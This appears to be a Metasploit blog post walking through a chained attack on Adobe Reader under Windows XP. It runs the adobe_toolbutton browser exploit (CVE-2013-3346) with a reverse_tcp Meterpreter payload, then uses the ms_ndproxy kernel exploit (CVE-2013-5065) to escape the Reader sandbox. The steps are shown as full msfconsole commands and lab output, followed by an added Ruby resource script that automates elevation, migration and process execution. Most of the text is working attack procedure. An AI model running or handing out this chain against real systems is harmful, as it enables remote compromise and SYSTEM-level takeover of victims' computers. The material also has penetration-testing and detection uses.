Last updated at Sat, 19 Aug 2017 18:30:07 GMT
Recently, FireEye identified and shared information about two vulnerabilities used in the wild to exploit Adobe Reader on Windows XP SP3 systems. The vulnerabilities are:
- CVE-2013-3346: A use-after-free in Adobe Reader, specifically in the handling of a ToolButton object, which can be triggered through the document's JavaScript. This vulnerability is used to get remote code execution through a malicious PDF document. The code runs in a renderer process, inside the Adobe Reader sandbox if one is available.
- CVE-2013-5065: An out-of-bounds array access in the Windows kernel driver ndproxy.sys. This vulnerability allows escaping the Adobe Reader sandbox, after which executing new processes and achieving persistence are easy. As already disclosed, remember that the Routing and Remote Access service must be enabled on the target so that the NDProxy driver is available.
Metasploit already has modules available for both vulnerabilities:
- CVE-2013-3346 is covered by two modules, the file format and the browser version of the exploit. At the time of writing the browser version targets Internet Explorer with Adobe Reader 9 and 10.
- CVE-2013-5065 is covered by a local Windows exploit.
In this blog post we're going to explain how to chain both modules to bypass the Adobe Reader sandbox, as was done in the wild.
- First of all, a session from a Reader renderer process is needed. To get it, either the file format or the browser version of the adobe_toolbutton exploit can be used. In this example, the browser version is used:
msf > use exploit/windows/browser/adobe_toolbutton
msf exploit(adobe_toolbutton) > set SRVHOST 192.168.172.1
SRVHOST => 192.168.172.1
msf exploit(adobe_toolbutton) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(adobe_toolbutton) > set LHOST 192.168.172.1
LHOST => 192.168.172.1
msf exploit(adobe_toolbutton) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.172.1:4444
[*] Using URL: http://192.168.172.1:8080/vMrwTnexHFjnis
[*] Server started.
msf exploit(adobe_toolbutton) > [*] 192.168.172.244 adobe_toolbutton - Gathering target information.
[*] 192.168.172.244 adobe_toolbutton - request: /vMrwTnexHFjnis/SZLfWc/
[*] 192.168.172.244 adobe_toolbutton - Sending PDF...
[*] Sending stage (769024 bytes) to 192.168.172.244
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.244:1039) at 2013-12-17 16:10:55 -0600
msf exploit(adobe_toolbutton) > sessions -i 1
[ ] Starting interaction with 1...
meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer : JUAN-C0DE875735
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
meterpreter >
- With this session it shouldn't be possible to execute a new process, nor to migrate into an existing process, because the Reader sandbox prevents both:
meterpreter > execute -f c:\\windows\\system32\\calc.exe
[-] stdapi_sys_process_execute: Operation failed: Access is denied.
meterpreter > ps -S AcroRd32|cmd
Filtering on process name...
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
3304 3128 AcroRd32.exe 4294967295
3336 3304 AcroRd32.exe x86 0 JUAN-C0DE875735\Administrator C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
3824 1452 cmd.exe 4294967295
meterpreter > migrate 3824
[*] Migrating from 3336 to 3824...
[-] Error running command migrate: Rex::RuntimeError Cannot migrate into this process (insufficient privileges)
- Here is where the ms_ndproxy local exploit comes to the rescue. Use it with the current session. Remember that the target process is, at the moment, inside the sandbox, so the exploit will elevate the current one in place (it cannot execute a new process).
meterpreter > background
[*] Backgrounding session 1...
msf exploit(adobe_toolbutton) > use exploit/windows/local/ms_ndproxy
msf exploit(ms_ndproxy) > set SESSION 1
SESSION => 1
msf exploit(ms_ndproxy) > exploit
[*] Started reverse handler on 10.6.0.165:4444
[*] Detecting the target system...
[*] Running against Windows XP SP3
[*] Checking device...
[+] \\.\NDProxy found!
[*] Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...
[+] Addresses successfully disclosed.
[*] Storing the kernel stager on memory...
[+] Kernel stager successfully stored at 0x1000
[*] Storing the trampoline to the kernel stager on memory...
[+] Trampoline successfully stored at 0x1
[*] Storing the IO Control buffer on memory...
[+] IO Control buffer successfully stored at 0xd0d0000
[*] Triggering the vulnerability, corrupting the HalDispatchTable...
[*] Executing the Kernel Stager throw NtQueryIntervalProfile()...
[*] Checking privileges after exploitation...
[+] Exploitation successful! Creating a new process and launching payload...
[!] Unable to create a new process, maybe you're into a sandbox. If the current process has been elevated try to migrate before executing a new process...
- So even though there isn't a new session in this case, the original one should belong to SYSTEM if the exploit was successful:
msf exploit(ms_ndproxy) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
- Even though we're still inside a sandboxed process, we should now be able to migrate out of it, and finally execute new processes:
meterpreter > execute -f c:\\windows\\system32\\calc.exe
[-] stdapi_sys_process_execute: Operation failed: Access is denied.
meterpreter > ps -S AcroRd32|cmd
Filtering on process name...
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
3304 3128 AcroRd32.exe x86 0 JUAN-C0DE875735\Administrator C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
3336 3304 AcroRd32.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
3824 1452 cmd.exe x86 0 JUAN-C0DE875735\Administrator C:\WINDOWS\system32\cmd.exe
meterpreter > migrate 3824
[*] Migrating from 3336 to 3824...
[*] Migration completed successfully.
meterpreter > execute -f c:\\windows\\system32\\calc.exe
Process 2372 created.
meterpreter > ps -S calc
Filtering on process name...
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
2372 3824 calc.exe x86 0 JUAN-C0DE875735\Administrator c:\windows\system32\calc.exe
meterpreter >
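The chain above, automated end to end, as an added example that is not code from this post or from the Metasploit modules it describes. The selection rules (is this session a sandboxed Reader renderer, did ms_ndproxy elevate it, which process is safe to migrate into) are plain Ruby over process lists shaped like Meterpreter's `get_processes` output, with sample lists constructed from the `ps` listings shown above. The msfconsole glue at the bottom (`framework.sessions`, `run_single`, `client.sys.process.get_processes`, `client.core.migrate`, `client.sys.process.execute`) only runs inside a resource script's `<ruby>` block, and its exact behaviour (for instance that `run_single('exploit')` returns once the local exploit finishes) is assumed rather than taken from the post.

```ruby
# Added example (not from the original post or the Metasploit modules).
# Helpers for chaining adobe_toolbutton -> ms_ndproxy -> migrate, written as
# plain Ruby so the decision logic can be exercised offline.

READER_IMAGE = 'AcroRd32.exe'.freeze
SYSTEM_USER  = 'NT AUTHORITY\\SYSTEM'.freeze

# Process entries use the keys Meterpreter's get_processes returns.
# Assumption: empty user/path and nil arch mean the agent could not open that
# process, which is what the sandboxed renderer sees for everything but itself.
def find_proc(procs, pid)
  procs.find { |p| p['pid'] == pid }
end

# A Reader renderer is an AcroRd32.exe whose parent is also AcroRd32.exe (the
# broker). That is the sandboxed process a toolbutton session lands in.
def reader_renderer?(procs, pid)
  me = find_proc(procs, pid)
  return false unless me && me['name'].casecmp(READER_IMAGE).zero?
  parent = find_proc(procs, me['ppid'])
  !parent.nil? && parent['name'].casecmp(READER_IMAGE).zero?
end

# Processes worth migrating into: not ourselves, not part of Reader, same
# architecture as the agent, and fully readable (user and path present), since
# migrate needs the same handle access that filled in those fields.
def migration_candidates(procs, current_pid, arch)
  procs.select { |p|
    p['pid'] != current_pid &&
      !p['name'].casecmp(READER_IMAGE).zero? &&
      p['arch'] == arch &&
      !p['user'].to_s.empty? && !p['path'].to_s.empty?
  }.map { |p| p['pid'] }
end

# The post-exploitation fingerprint shown in the post: a renderer running as
# SYSTEM under a broker that runs as an ordinary user. Confirms ms_ndproxy
# worked, and is just as useful as a detection rule over process telemetry.
def elevated_renderers(procs)
  procs.select { |p|
    parent = find_proc(procs, p['ppid'])
    p['name'].casecmp(READER_IMAGE).zero? && parent &&
      p['user'] == SYSTEM_USER &&
      !parent['user'].to_s.empty? && parent['user'] != SYSTEM_USER
  }.map { |p| p['pid'] }
end

# Constructed sample data mirroring the two ps listings in the post.
READER_PATH = 'C:\\Program Files\\Adobe\\Reader 11.0\\Reader\\AcroRd32.exe'.freeze
BEFORE = [
  { 'pid' => 3304, 'ppid' => 3128, 'name' => 'AcroRd32.exe', 'arch' => nil, 'session' => nil, 'user' => '', 'path' => '' },
  { 'pid' => 3336, 'ppid' => 3304, 'name' => 'AcroRd32.exe', 'arch' => 'x86', 'session' => 0,
    'user' => 'JUAN-C0DE875735\\Administrator', 'path' => READER_PATH },
  { 'pid' => 3824, 'ppid' => 1452, 'name' => 'cmd.exe', 'arch' => nil, 'session' => nil, 'user' => '', 'path' => '' },
].freeze
AFTER = [
  { 'pid' => 3304, 'ppid' => 3128, 'name' => 'AcroRd32.exe', 'arch' => 'x86', 'session' => 0,
    'user' => 'JUAN-C0DE875735\\Administrator', 'path' => READER_PATH },
  { 'pid' => 3336, 'ppid' => 3304, 'name' => 'AcroRd32.exe', 'arch' => 'x86', 'session' => 0,
    'user' => SYSTEM_USER, 'path' => READER_PATH },
  { 'pid' => 3824, 'ppid' => 1452, 'name' => 'cmd.exe', 'arch' => 'x86', 'session' => 0,
    'user' => 'JUAN-C0DE875735\\Administrator', 'path' => 'C:\\WINDOWS\\system32\\cmd.exe' },
].freeze

# msfconsole glue (assumed API): place this file's contents inside a
# <ruby> ... </ruby> block of a resource script, with the adobe_toolbutton
# session already open. Nothing below runs outside msfconsole.
if defined?(framework) && framework && !framework.sessions.empty?
  sid    = framework.sessions.keys.first          # assumption: the renderer session
  client = framework.sessions[sid]
  pid    = client.sys.process.getpid
  procs  = client.sys.process.get_processes
  raise "session #{sid} is not a sandboxed Reader renderer" unless reader_renderer?(procs, pid)

  run_single('use exploit/windows/local/ms_ndproxy')
  run_single("set SESSION #{sid}")
  run_single('exploit')                           # elevates the current process in place

  procs = client.sys.process.get_processes        # with a SYSTEM token, other processes are readable
  raise 'renderer was not elevated' if elevated_renderers(procs).empty?
  target = migration_candidates(procs, pid, client.arch).first
  raise 'no non-sandboxed process to migrate into' unless target
  client.core.migrate(target)                     # leave the sandbox
  client.sys.process.execute('c:\\windows\\system32\\calc.exe', nil, 'Hidden' => false)
end
```

The ordering matters: the candidate list is recomputed only after ms_ndproxy has run, because before elevation the renderer cannot open cmd.exe at all (it shows up with no user, path or arch), and a migration attempt at that point fails exactly as shown earlier.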
Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments.